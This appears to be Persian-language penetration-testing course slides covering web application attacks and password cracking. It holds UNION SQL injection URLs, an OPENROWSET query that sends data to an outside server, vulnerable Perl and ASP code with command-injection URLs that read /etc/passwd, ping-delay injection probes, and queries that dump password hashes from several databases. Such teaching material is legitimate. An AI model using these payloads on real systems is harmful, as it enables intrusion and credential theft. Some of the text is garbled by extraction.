     http://[site]/page.asp?id=1 UNION SELECT ALL 1,name,3,4 from sysobjects where xtype=char(85)—
  ‫استخراج نام‬Column ‫ های‬Table‫ها‬
     http://[site]/page.asp?id=1 UNION SELECT ALL 1,column_name,3,4 from
     DBNAME.information_schema.columns where table_name='TABLE-NAME-1'—
  ‫استخراج اولین‬Field
     http://[site]/page.asp?id=1 UNION SELECT ALL 1,COLUMN-NAME-1,3,4 from TABLE-NAME-1—
  ‫استخراج دومین‬Field
     http://[site]/page.asp?id=1 UNION SELECT ALL 1,COLUMN-NAME-2,3,4 from TABLE-NAME-1--
                                                   49
                           ‫حمله به نرم افزارهای تحت وب‬
          Blind SQL Injection ‫استخراج اطالعات مورد نظر در حمالت‬            
                 (http://www.evilsql.com/page1.html)
     (Out of band channles) ‫آشنایی با روش های غیر معمول استخراج اطالعات‬           
                                MS-SQL Openrowset 
  insert into openrowset(‗SQLOLEDB‘,‗DRIVER={SQL
  Server};SERVER=10.20.10.20,80;UID=sa;PWD=1234‘,‗select * from
  foo‘) values (@@version)
                                    DNS Resolve 
                                     HTTP GET 
  http://www.cqure.net/files/OWASP%20-%20Sweden%20-%2020080527%20-%20SQL%20injection.zip  


                  SQL Injection ‫اجرای دستورات سیستم عامل از طریق‬        
                   ‫ استخراج اطالعات‬Automated ‫بررسی ابزارهای‬          
                                                 50
                                ‫حمله به نرم افزارهای تحت وب‬

              OS Command Injection ‫ بررسی حمالت‬
use CGI qw(:standard escapeHTML);
print header, start_html(―‖);                    Perl Applications 
print ―<pre>‖;
my $command = ―du -h --exclude php* /var/www/html‖;
$command= $command.param(―dir‖);
$command=`$command`;
print ―$command\n‖;
print end_html;

http://web-app/cgi-
bin/vuln.cgi?dir=/public|%20cat%/etc/passwd
<%                                  ASP Applications 
Set oScript = Server.CreateObject(―WSCRIPT.SHELL‖)
Set oFileSys = Server.CreateObject(―Scripting.FileSystemObject‖)
szCMD = ―type c:\inetpub\wwwroot\logs\― & Request.Form(―FileName‖)
szTempFile = ―C:\― & oFileSys.GetTempName()
Call oScript.Run (―cmd.exe /c ― & szCMD & ― > ― & szTempFile,
0, True)
Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
%>

http://web-app/view.asp [Form Data  sample.log && dir c:\
                                              51
                  ‫حمله به نرم افزارهای تحت وب‬
                ‫‪ ‬بررسی حمالت ‪(2) Command Injection‬‬
                         ‫‪ ‬روش های شناسایی‬
‫تزریق کاراکترهای خاص در پارامترها ، قبل از دستورات و مشاهده مستقیم نتیجه‬  ‫‪‬‬
                        ‫‪ ‬کاراکتر های && | ;‬
                 ‫تزریق و تشخیص بر اساس تآخیرهای زمانی‬   ‫‪‬‬
                   ‫‪| ping –i 30 127.0.0.1 | ‬‬
                   ‫‪| ping –n 30 127.0.0.1 | ‬‬
                  ‫‪& ping –i 30 127.0.0.1 & ‬‬
                 ‫‪& ping –n 30 127.0.0.1 & ‬‬
                       ‫‪; ping 127.0.0.1 ; ‬‬
              ‫‪%0a ping –i 30 127.0.0.1 %0a ‬‬
                       ‫‪` ping 127.0.0.1 ` ‬‬
      ‫تزریق و تشخیص بر اساس مشاهده خروجی دستور از سایر روش ها‬    ‫‪‬‬

                   ‫‪ ‬بررسی حمالت ‪Code Injection‬‬
                ‫‪Dynamic Code Execution in PHP ‬‬
                 ‫‪Dynamic Code Execution in ASP‬‬         ‫‪‬‬
                         ‫‪File Inclusion‬‬        ‫‪‬‬
                ‫)‪PHP Remote File Inclusion (RFI‬‬      ‫‪‬‬
                    ‫)‪Local File Inclusin (LFI‬‬      ‫‪‬‬
                                          ‫25‬
                          ‫حمله به نرم افزارهای تحت وب‬
                     ‫بررسی حمالت ‪Path Traversal‬‬
                 ‫)433 ‪(WAHHB Page‬‬                   ‫‪‬‬
     ‫)573 ‪(WAHHB Page‬‬  ‫بررسی حمالت )‪Cross Site Scripting (XSS‬‬          ‫‪‬‬
                 ‫بررسی انواع حمالت ‪ XSS‬و تفاوت های آنها‬     ‫‪‬‬
                               ‫‪Reflected XSS‬‬  ‫‪‬‬
                                ‫‪Stored XSS‬‬  ‫‪‬‬

                            ‫شناسایی ضعف های ‪XSS‬‬
                      ‫)104 ‪(WAHHB Page‬‬            ‫‪‬‬

                          ‫بررسی کاربردهای حمالت ‪XSS‬‬   ‫‪‬‬
                         ‫سرقت ‪ Session‬کاربر‬     ‫‪‬‬
       ‫‪ Bypass‬کردن برخی محدودیت های ‪Web Application‬‬          ‫‪‬‬
‫ارسال درخواست بجای کاربر به ‪ web application‬برای انجام عملی خاص‬        ‫‪‬‬
           ‫بررسی سایر روش های سو استفاده )693 ‪(WAHHB Page‬‬     ‫‪‬‬

     ‫بررسی حمالت ‪Parameter Tampering/Manipulation‬‬                 ‫‪‬‬
             ‫بررسی حمالت ‪Forceful Browsing‬‬                ‫‪‬‬
       ‫معرفی ابزارهای پویش و بررسی نرم افزارهای تحت وب‬             ‫‪‬‬                                             ‫35‬
                             ‫حمالت علیه کلمات عبور‬
                            ‫‪ ‬تقسیم بندی کلی حمالت‬
                             ‫‪Online Attacks‬‬    ‫‪‬‬
‫تمرکز بر روی کشف نام کاربری و کلمه عبور از طریق اقدام به تعامل با سرویس‬   ‫‪‬‬
 ‫نیازمند اقدام به برقراری ارتباط با هدف بطور مستقیم برای حدس کلمات عبور‬  ‫‪‬‬
       ‫نیازمند در دسترس بودن سرویس های خاص بمنظور تعامل با آنها‬   ‫‪‬‬
 ‫قابلیت شناسایی آسان بدلیل حجم ترافیک و رویداد های تولید شده در طول حمله‬  ‫‪‬‬
   ‫سرعت بسیار پایین در مقایسه با حمالت ‪ ، Offline‬و وابسته به منابع شبکه‬  ‫‪‬‬
                ‫عدم نیاز به قدرت پردازش باال در سمت نفوذگر‬  ‫‪‬‬
                             ‫‪Offline Attacks‬‬    ‫‪‬‬
   ‫تمرکز بر روی شکستن کلمات عبور رمز/کد شده که از هدف بدست آمده‬     ‫‪‬‬
             ‫عدم نیاز به برقراری ارتباط با هدف در طول حمله‬   ‫‪‬‬
 ‫نیازمند تعامل با سرویس / سیستم تنها بمنظور استخراج کلمات عبور رمز شده‬   ‫‪‬‬
 ‫امکان شناسایی تنها در زمان استخراج کلمات عبور رمز شده )در شرایط خاص(‬    ‫‪‬‬
       ‫سرعت بسیار باال ) وابسته به روش رمزنگاری بکار برده شده (‬    ‫‪‬‬
                 ‫نیازبه قدرت پردازش باال در سمت نفوذگر‬   ‫‪‬‬
                                          ‫45‬
                                   ‫حمالت علیه کلمات عبور‬
                                       ‫‪Online Attacks‬‬     ‫‪‬‬
                 ‫قابل پیاده سازی از طریق سرویس ها وپروتکل های مختلف‬       ‫‪‬‬
                      ‫سرویس ها و پروتکل های دسترسی از راه دور‬
         ‫)…,‪(Telnet,SSH,Rlogin,TS,VNC‬‬                       ‫‪‬‬
                            ‫سرویس های پستی )…,‪(POP,SMTP,IMAP‬‬  ‫‪‬‬
                   ‫سرویس های بانک اطالعاتی )…,‪(MS-SQL,MySQL,Oracle‬‬    ‫‪‬‬
                ‫سرویس های وابسته به وب )…,‪(HTTP,Login Forms,Proxies,Socks‬‬  ‫‪‬‬
                    ‫پروتکل های مدیریت از راه دور )…,‪(SNMP,RPC,WMI‬‬    ‫‪‬‬
‫و هر سرویس دیگری که برای دسترسی نیاز به ارسال نام کاربری و کلمه عبور داشته باشد !‬      ‫‪‬‬

                 ‫بررسی روش ها و ابزارهای مختلف پیاده سازی حمله‬         ‫‪‬‬

                 ‫بررسی روش های متداول مقابله با این دسته از حمالت‬       ‫‪‬‬

                ‫نکاتی در خصوص نام های کاربری و کلمات عبور پیشفرض‬         ‫‪‬‬
      ‫‪Networking Devices,Database Systems,Product default‬‬               ‫‪‬‬
  ‫‪accounts,Product Master/Hidden/Hardcoded passwords,Service‬‬
                           ‫‪accounts‬‬
          ‫نکاتی در خصوص انتخاب فایل های دیکشنری و محدوده کلمات عبور‬          ‫‪‬‬
                                                    ‫55‬
                         ‫حمالت علیه کلمات عبور‬

                        ‫‪Offline Attacks ‬‬
    ‫‪ ‬آشنایی با مکانیزم های ‪ Hash‬و ‪ Encoding‬کلمات عبور‬
‫‪ ‬آشنایی با برخی سرویس ها و مکانیزم های بکار برده شده توسط آنها‬
       ‫‪ ‬بررسی روش های بدست آوردن کلمات عبور رمز شده‬
      ‫‪ ‬استخراج از فایل های خاص ذخیره کلمات عبور سیستم عامل‬
          ‫‪C:\windows\system32\config\SAM ‬‬
              ‫‪/etc/passwd & /etc/shadow ‬‬
         ‫‪ ‬استخراج از فایل های حاوی تنظیمات سیستم یا سرویس‬
                     ‫‪ ‬استخراج از ترافیک شبکه‬
                  ‫‪ ‬استخراج از بانک های اطالعاتی‬                                   ‫65‬
                              ‫حمالت علیه کلمات عبور‬
                                 Offline Attacks  
           ‫بررسی روش های بدست آوردن کلمات عبور رمز شده‬        
                       ‫استخراج از بانک های اطالعاتی‬  
                               MySQL
                select user, password from user    
 select name, password from master..sysxlogins     MS-SQL 2000  
select name,password_hash FROM sys.sql_logins     MS-SQL 2005  
  select username, password from DBA_USERS         Oracle  
    select name,password from SYS.USER$         Oracle  
   select usename, passwd FROM pg_shadow       PortageSQL  
             ‫بررسی تکنیک های شکستن کلمات عبور رمز شده‬       
            Dictonary , Bruteforce , Hybrid           
     (Pre-Computed Rainbow Tables) Cryptanalysis            
                  Cryptography flaws            
                     ‫بررسی روش های پیاده سازی حمالت‬    
                     Single System           
                  Distributed Systems           
        Free & Commercial Cryptanalysis providers          
                                            57

				
DOCUMENT INFO